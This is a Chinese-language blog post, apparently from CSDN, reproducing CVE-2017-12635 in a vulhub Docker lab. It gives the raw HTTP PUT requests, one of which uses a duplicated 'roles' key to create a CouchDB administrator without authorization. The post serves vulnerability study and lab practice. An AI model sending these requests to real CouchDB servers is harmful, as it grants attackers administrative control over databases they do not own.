CVE-2017-12635(Couchdb垂直权限绕过漏洞)

最新推荐文章于 2024-07-20 11:03:15 发布
最新推荐文章于 2024-07-20 11:03:15 发布
阅读量1.7k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: CVE-2017-12635
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84191281
版权

简介

Apache CouchDB是一个开源数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于二郎和JavaScript的对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本:小于1.7.0以及小于2.1.1
参考链接:
http://bobao.360.cn/learning/detail/4716.html
https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

测试环境

https://blog.csdn.net/qq_36374896/article/details/84102101

编译及启动环境:

cd vulhub-master/couchdb/CVE-2017-12635/
docker-compose build
docker-compose up -d
环境启动后,访问http://your-ip:5984/_utils/即可看到一个网页页面,说明的CouchDB已成功启动。但我们不知道密码,无法登陆。
在这里插入图片描述

漏洞复现

首先,发送如下数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

在这里插入图片描述
可见,返回403错误:{“error”:“forbidden”,“reason”:“Only _admin may set roles”},只有管理员才能设置角色角色:

发送包含两个角色的数据包,即可绕过限制:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

成功创建管理员,账户密码均为vulhub:
在这里插入图片描述
再次访问http://your-ip:5984/_utils/,输入账户密码vulhub,可以成功登录:
在这里插入图片描述

浅笑⁹⁹⁶
关注
专栏目录
Couchdb 垂直权限绕过漏洞CVE-2017-12635
一枚不知名的Java程序猿
10-02 971
vulhub漏洞复现学习过程
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
weixin_45260839的博客
06-18 1013
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
服务攻防-数据库-cve复现
最新发布
m0_74402888的博客
07-20 890
在`v3.2.2`版本之前的`Apache CouchDB`中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限,进而实现。
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
weixin_46239998的博客
01-01 849
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。影响版本:小于 1.7.0 以及 小于 2.1.1。密码:password。
利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞CVE-2017-12635
07-17 155
漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15...
couchdb 垂直权限绕过漏洞cve-2017-12635
whatday的专栏
06-08 795
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
Couchdb 垂直权限绕过漏洞CVE-2017-12635)复现
玄道的网安博客
05-06 3272
简介 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 影响版本 版本<1.7.0以及 <2.1.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 编译及启动环境: ...
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 383
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
CVE-2017-12635+12636 复现+反弹shell
weixin_45695535的博客
05-08 1480
整体过程漏洞描述一、复现过程环境复现cve-2017-12636反弹shellpython3 exp 反弹shell参考文章 漏洞描述 Apache CouchDB 是一个开源数据库,专注于易用性和成为” 完全拥抱 web 的数据库”。它是一个使用 JSON 作为存储格式,JavaScript 作为查询语言,MapReduce 和 HTTP 作为 API 的 NoSQL 数据库。应用广泛,如 BBC 用在其动态内容展示平台,Credit Suisse 用在其内部的商品部门的市场框架,Meebo,用在其社交
漏洞复现----50、Couchdb 垂直权限绕过漏洞CVE-2017-12635
七天
07-08 1594
Couchdb 垂直权限绕过漏洞CVE-2017-12635
12 - vulhub - Couchdb 垂直权限绕过漏洞CVE-2024-12635
m0_60452134的博客
04-12 327
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
CouchDB垂直越权漏洞CVE-2017-12635
小小猪的博客
12-27 765
CouchDB垂直越权漏洞CVE-2017-12635) 框架介绍: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序) 环境搭建: 采用在线环境 地址 漏洞分析: 主要关注改包的过
couchdb 权限绕过CVE-2017-12635)复现
YouthBelief的博客
11-04 980
couchdb 权限绕过CVE-2017-12635)复现couchdb 权限绕过CVE-2017-12635)复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具反弹shell0x04 漏洞修复 couchdb 权限绕过CVE-2017-12635)复现 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如B
CVE-2017-12635 垂直权限绕过
m0_63034363的博客
07-09 518
CVE-2017-12635 垂直权限绕过主要是因为Erlang和JavaScript对JSON解析方式的不同造就此漏洞
Couchdb垂直权限绕过(CVE-2017-12635)
m0_65150886的博客
01-15 475
它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。
12 - vulhub - Couchdb 垂直权限绕过漏洞CVE-2017-12635
易编橙 · 终身成长社群,相遇已是上上签!
10-21 473
Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 在2017年11月15日,CVE-2017-12635CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞
CVE-2017-7525漏洞检测PoC示例与分析
漏洞检测CVE-2017-7525是一个与Apache Xalan XML处理器相关的安全漏洞。这个PoC(Proof of Concept)脚本展示了如何利用该漏洞进行攻击,通常在IT安全评估和漏洞管理中扮演关键角色。CVE-2017-7525涉及到远程代码...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值